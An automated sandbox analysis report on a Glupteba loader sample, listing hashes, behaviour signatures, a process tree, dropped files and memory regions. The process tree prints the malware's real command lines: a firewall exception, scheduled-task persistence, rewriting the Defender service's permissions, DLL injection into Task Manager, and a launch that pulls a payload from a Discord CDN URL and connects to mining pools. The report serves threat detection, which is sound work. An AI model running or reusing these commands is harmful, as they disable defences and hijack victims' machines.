Analysis

  • max time kernel
    257s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16/05/2024, 23:36

General

  • Target

    86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe

  • Size

    4.1MB

  • MD5

    e0e1ee22a2a7e89d0e974ddcafec1ad8

  • SHA1

    59984a24de697e697b2b62da9c50f53baef97613

  • SHA256

    86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058

  • SHA512

    66c8fa3ff59336c5ff79b22aa291b73c51a77865dd96eca428449904cd157be45bdadabd90d7c2860b4b7e5d35b6c566a83ae08e9beda6a1884453fe11c00df1

  • SSDEEP

    98304:IjBgyvXIU5i0ZT37WYIgo6CvO2n1yECcNHBKQxGN:qB+ki0ZT37WYo6qf1ySNh3A

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 30 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 4 IoCs
  • UPX packed file 18 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 7 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe
    "C:\Users\Admin\AppData\Local\Temp\86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2864
    • C:\Users\Admin\AppData\Local\Temp\86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe
      "C:\Users\Admin\AppData\Local\Temp\86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe"
      2⤵
      • Windows security bypass
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:396
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4404
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:4132
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2896
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:692
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Manipulates WinMonFS driver.
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4188
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Command and Scripting Interpreter: PowerShell
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4956
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4780
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
            PID:2284
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4420
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:196
          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:4324
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:2292
          • C:\Windows\windefender.exe
            "C:\Windows\windefender.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2600
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4464
              • C:\Windows\SysWOW64\sc.exe
                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                6⤵
                • Launches sc.exe
                • Suspicious use of AdjustPrivilegeToken
                PID:868
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:2988
          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
            4⤵
              PID:2496
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:2124
            • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
              4⤵
                PID:1580
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                4⤵
                • Command and Scripting Interpreter: PowerShell
                PID:1320
              • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                4⤵
                  PID:1260
          • C:\Windows\windefender.exe
            C:\Windows\windefender.exe
            1⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            PID:4304

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phbpi14d.xxd.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

            Filesize

            2.0MB

            MD5

            1bf850b4d9587c1017a75a47680584c4

            SHA1

            75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

            SHA256

            ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

            SHA512

            ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

          • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

            Filesize

            2.8MB

            MD5

            713674d5e968cbe2102394be0b2bae6f

            SHA1

            90ac9bd8e61b2815feb3599494883526665cb81e

            SHA256

            f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

            SHA512

            e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

            Filesize

            2.0MB

            MD5

            dcb505dc2b9d8aac05f4ca0727f5eadb

            SHA1

            4f633edb62de05f3d7c241c8bc19c1e0be7ced75

            SHA256

            61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

            SHA512

            31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

            Filesize

            281KB

            MD5

            d98e33b66343e7c96158444127a117f6

            SHA1

            bb716c5509a2bf345c6c1152f6e3e1452d39d50d

            SHA256

            5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

            SHA512

            705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            1c19c16e21c97ed42d5beabc93391fc5

            SHA1

            8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

            SHA256

            1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

            SHA512

            7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            8b211e5940ff4d1e86039fb3abae0763

            SHA1

            c260ecfbb1fca55b675ce76246f775bf7fc717e2

            SHA256

            d439fe629bbb4cb5b21e3b43dd36e32316899ff82e31986a8a71bf4c62d4c23c

            SHA512

            43c410e243ac29a1c2fff0a417689e1c5ead1bbd8ab92db6c7b73980bc428d0836f4d3321abfd9b9282215efd3cdbe9557945d6bead425ffb59c3a8d112b2db3

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            2c72522e5a35146d5111b1cd9b9ef740

            SHA1

            f99b86cb4ee4dcfb7ba7c4b5925d3c8975d98f08

            SHA256

            2326b40e99fd300f86d40f41f222d06d23cefc55994bcb9c3d579e0ce8842412

            SHA512

            cb6c069c4e66131cea23a04ab24de1b1abd03fc4e9ca6052e6b3351fc26180a343e0dfb22c567a11141ec6c5fb092f58b1173f545220ab4b829b3eb365bd29b2

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            2a60b7e53a3ddabfc6cf4d6a68c52714

            SHA1

            9fa4662f35d65310036ef2775eb698d85e3c1a3d

            SHA256

            54395bb72dca43893695559afeca0e3416cb2e0dbce055390f952a59c0614ad3

            SHA512

            5c0c57093b7464d63caa3cfd4c5527c52430b483e8179523e212213b5ed23c2d77f990be10d53224e7e582f9b98926c09f2ce55377a1c7fed009ea5e5cd124c1

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            826092d554d836cf46d626294d73e218

            SHA1

            8a85bc39dc505ad4742e9e3acf4f4c1c01512ec9

            SHA256

            d24a87cfa379466a72e2abce3b27cdd93cdeacd288c18da66a2323b7014e33ac

            SHA512

            9670f5ea9257244c93e9b41b4d962473394cf722a40d766bade8b41b05ff51ce075780c779b27c835360134e40ff4d1e6eb8d7f495a89b67cbca06cd9f47779c

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            28d798da185bf344e1ade7ceaa9ae5de

            SHA1

            f5588122f00d2c7e17e4d2e5b5c40df776a379e9

            SHA256

            10c5b8f91556ed1c3bebac0b65ffb7ee16217a769318bdf2c7ad9a5e094a7fb5

            SHA512

            a2c9f1536275c84fd2427969b7ab33f3bbcb81d5d33f3e2651bcaa8b44f24c1251607073b871df5b0c296a14b4831562d51848fb40ef75665c43d15157c511c3

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            f39dd0049a9bb23ee32fcaed65ab6684

            SHA1

            3a8fa2ea83e27723fa110634801574aa8124efdd

            SHA256

            9fd60fb22eb4572764c86bc71997a08a717b16003e5a2c820a79de548f017822

            SHA512

            3264ffdf018a914ea2a1d6b5804d7ef923ed407b2582e9c99fcd9090c9c7201d1ac791c54bbc77f104033ca24bf53ca8c366caab6c9ba7edd13a5663d679450c

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            8ee649a834aad05619553abf844855af

            SHA1

            1af12fa5cfdeec5b804c4164f9212ce5cd6fc344

            SHA256

            f43f5dbbd0f6ea43b15eea6b0b731bf192813a222f2023471f84cffb99457463

            SHA512

            084fb3036fb58cb46046abc5999197762bdc02b5d548ab22cdacb9636df4bed6b04bf8f5186c78313f70f2583b72199b0b6bbf9d8700bffbcdf9936f58ca50ca

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            63eabac68530be91dcaaccc2d5988951

            SHA1

            f9008998b8579141865b13f8dc83535560f51c3c

            SHA256

            f476fd9ef42d61dca1954e4a8fbe90b5556ddae9d62fe5df8ccf2a95a5698ac7

            SHA512

            929fcead730e1bfac4764f797bac4805c7ec58c04c140dbe5896c97e0d7e936fdad5e7220f2b64bd17c17a46f1a49777c612408b727715d6f1a32d88bf6a4e8c

          • C:\Windows\rss\csrss.exe

            Filesize

            4.1MB

            MD5

            e0e1ee22a2a7e89d0e974ddcafec1ad8

            SHA1

            59984a24de697e697b2b62da9c50f53baef97613

            SHA256

            86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058

            SHA512

            66c8fa3ff59336c5ff79b22aa291b73c51a77865dd96eca428449904cd157be45bdadabd90d7c2860b4b7e5d35b6c566a83ae08e9beda6a1884453fe11c00df1

          • C:\Windows\windefender.exe

            Filesize

            2.0MB

            MD5

            8e67f58837092385dcf01e8a2b4f5783

            SHA1

            012c49cfd8c5d06795a6f67ea2baf2a082cf8625

            SHA256

            166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

            SHA512

            40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

          • memory/196-1523-0x000000006FA90000-0x000000006FDE0000-memory.dmp

            Filesize

            3.3MB

          • memory/196-1522-0x000000006FA40000-0x000000006FA8B000-memory.dmp

            Filesize

            300KB

          • memory/396-1022-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/692-802-0x000000006FBE0000-0x000000006FF30000-memory.dmp

            Filesize

            3.3MB

          • memory/692-801-0x000000006FB90000-0x000000006FBDB000-memory.dmp

            Filesize

            300KB

          • memory/1104-302-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/1104-1-0x0000000002900000-0x0000000002D05000-memory.dmp

            Filesize

            4.0MB

          • memory/1104-2-0x0000000002D10000-0x00000000035FB000-memory.dmp

            Filesize

            8.9MB

          • memory/1104-3-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/1104-303-0x0000000002D10000-0x00000000035FB000-memory.dmp

            Filesize

            8.9MB

          • memory/1260-2533-0x0000000000400000-0x00000000008E8000-memory.dmp

            Filesize

            4.9MB

          • memory/1260-2521-0x0000000000400000-0x00000000008E8000-memory.dmp

            Filesize

            4.9MB

          • memory/1260-2526-0x0000000000400000-0x00000000008E8000-memory.dmp

            Filesize

            4.9MB

          • memory/1320-2304-0x000000006F9C0000-0x000000006FD10000-memory.dmp

            Filesize

            3.3MB

          • memory/1320-2283-0x0000000007BD0000-0x0000000007F20000-memory.dmp

            Filesize

            3.3MB

          • memory/1320-2303-0x000000006F950000-0x000000006F99B000-memory.dmp

            Filesize

            300KB

          • memory/1580-2528-0x0000000000D50000-0x000000000161D000-memory.dmp

            Filesize

            8.8MB

          • memory/1580-2524-0x0000000000D50000-0x000000000161D000-memory.dmp

            Filesize

            8.8MB

          • memory/1580-2280-0x0000000000D50000-0x000000000161D000-memory.dmp

            Filesize

            8.8MB

          • memory/2124-2062-0x000000006F9A0000-0x000000006FCF0000-memory.dmp

            Filesize

            3.3MB

          • memory/2124-2061-0x000000006F950000-0x000000006F99B000-memory.dmp

            Filesize

            300KB

          • memory/2496-2037-0x0000000000400000-0x00000000008E1000-memory.dmp

            Filesize

            4.9MB

          • memory/2496-2041-0x0000000000400000-0x00000000008E1000-memory.dmp

            Filesize

            4.9MB

          • memory/2600-1749-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/2600-1746-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/2864-14-0x0000000008070000-0x00000000083C0000-memory.dmp

            Filesize

            3.3MB

          • memory/2864-11-0x0000000007680000-0x00000000076A2000-memory.dmp

            Filesize

            136KB

          • memory/2864-83-0x0000000072D60000-0x000000007344E000-memory.dmp

            Filesize

            6.9MB

          • memory/2864-76-0x000000006FAC0000-0x000000006FE10000-memory.dmp

            Filesize

            3.3MB

          • memory/2864-77-0x000000000A380000-0x000000000A39E000-memory.dmp

            Filesize

            120KB

          • memory/2864-82-0x000000000A3E0000-0x000000000A485000-memory.dmp

            Filesize

            660KB

          • memory/2864-73-0x000000000A3A0000-0x000000000A3D3000-memory.dmp

            Filesize

            204KB

          • memory/2864-74-0x0000000072D60000-0x000000007344E000-memory.dmp

            Filesize

            6.9MB

          • memory/2864-75-0x000000006FA70000-0x000000006FABB000-memory.dmp

            Filesize

            300KB

          • memory/2864-66-0x0000000009570000-0x00000000095E6000-memory.dmp

            Filesize

            472KB

          • memory/2864-35-0x00000000094B0000-0x00000000094EC000-memory.dmp

            Filesize

            240KB

          • memory/2864-16-0x0000000008830000-0x000000000887B000-memory.dmp

            Filesize

            300KB

          • memory/2864-15-0x0000000008400000-0x000000000841C000-memory.dmp

            Filesize

            112KB

          • memory/2864-300-0x0000000072D60000-0x000000007344E000-memory.dmp

            Filesize

            6.9MB

          • memory/2864-282-0x000000000A550000-0x000000000A558000-memory.dmp

            Filesize

            32KB

          • memory/2864-84-0x000000000A5C0000-0x000000000A654000-memory.dmp

            Filesize

            592KB

          • memory/2864-13-0x0000000007D10000-0x0000000007D76000-memory.dmp

            Filesize

            408KB

          • memory/2864-12-0x0000000007F50000-0x0000000007FB6000-memory.dmp

            Filesize

            408KB

          • memory/2864-10-0x0000000072D60000-0x000000007344E000-memory.dmp

            Filesize

            6.9MB

          • memory/2864-8-0x0000000072D60000-0x000000007344E000-memory.dmp

            Filesize

            6.9MB

          • memory/2864-277-0x000000000A560000-0x000000000A57A000-memory.dmp

            Filesize

            104KB

          • memory/2864-6-0x0000000072D6E000-0x0000000072D6F000-memory.dmp

            Filesize

            4KB

          • memory/2864-9-0x00000000076D0000-0x0000000007CF8000-memory.dmp

            Filesize

            6.2MB

          • memory/2864-7-0x0000000004F70000-0x0000000004FA6000-memory.dmp

            Filesize

            216KB

          • memory/2896-546-0x00000000080A0000-0x00000000083F0000-memory.dmp

            Filesize

            3.3MB

          • memory/2896-567-0x000000006FC00000-0x000000006FF50000-memory.dmp

            Filesize

            3.3MB

          • memory/2896-566-0x000000006FB90000-0x000000006FBDB000-memory.dmp

            Filesize

            300KB

          • memory/2988-1824-0x0000000009BC0000-0x0000000009C65000-memory.dmp

            Filesize

            660KB

          • memory/2988-1818-0x000000006F950000-0x000000006F99B000-memory.dmp

            Filesize

            300KB

          • memory/2988-1819-0x000000006F9A0000-0x000000006FCF0000-memory.dmp

            Filesize

            3.3MB

          • memory/2988-1799-0x0000000008B80000-0x0000000008BCB000-memory.dmp

            Filesize

            300KB

          • memory/2988-1797-0x0000000007F80000-0x00000000082D0000-memory.dmp

            Filesize

            3.3MB

          • memory/4188-1792-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1752-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1762-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1764-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1766-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1768-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1770-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1772-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1774-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1776-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1778-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1780-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1782-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1784-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1786-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1788-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1790-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1760-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1794-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1758-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1756-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-2534-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1754-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-2529-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-2525-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1750-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-2522-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4188-1741-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4304-1755-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/4304-1761-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/4304-1751-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/4304-1748-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/4404-328-0x000000006FBE0000-0x000000006FF30000-memory.dmp

            Filesize

            3.3MB

          • memory/4404-307-0x0000000007C80000-0x0000000007FD0000-memory.dmp

            Filesize

            3.3MB

          • memory/4404-308-0x0000000008250000-0x000000000829B000-memory.dmp

            Filesize

            300KB

          • memory/4404-327-0x000000006FB90000-0x000000006FBDB000-memory.dmp

            Filesize

            300KB

          • memory/4404-333-0x00000000097F0000-0x0000000009895000-memory.dmp

            Filesize

            660KB

          • memory/4420-1265-0x0000000007C70000-0x0000000007FC0000-memory.dmp

            Filesize

            3.3MB

          • memory/4420-1286-0x000000006FA40000-0x000000006FA8B000-memory.dmp

            Filesize

            300KB

          • memory/4420-1267-0x00000000082F0000-0x000000000833B000-memory.dmp

            Filesize

            300KB

          • memory/4420-1292-0x0000000009870000-0x0000000009915000-memory.dmp

            Filesize

            660KB

          • memory/4420-1287-0x000000006FA90000-0x000000006FDE0000-memory.dmp

            Filesize

            3.3MB

          • memory/4956-1027-0x00000000078B0000-0x0000000007C00000-memory.dmp

            Filesize

            3.3MB

          • memory/4956-1029-0x0000000007DF0000-0x0000000007E3B000-memory.dmp

            Filesize

            300KB

          • memory/4956-1048-0x000000006FAF0000-0x000000006FB3B000-memory.dmp

            Filesize

            300KB

          • memory/4956-1054-0x0000000009320000-0x00000000093C5000-memory.dmp

            Filesize

            660KB

          • memory/4956-1049-0x000000006FB40000-0x000000006FE90000-memory.dmp

            Filesize

            3.3MB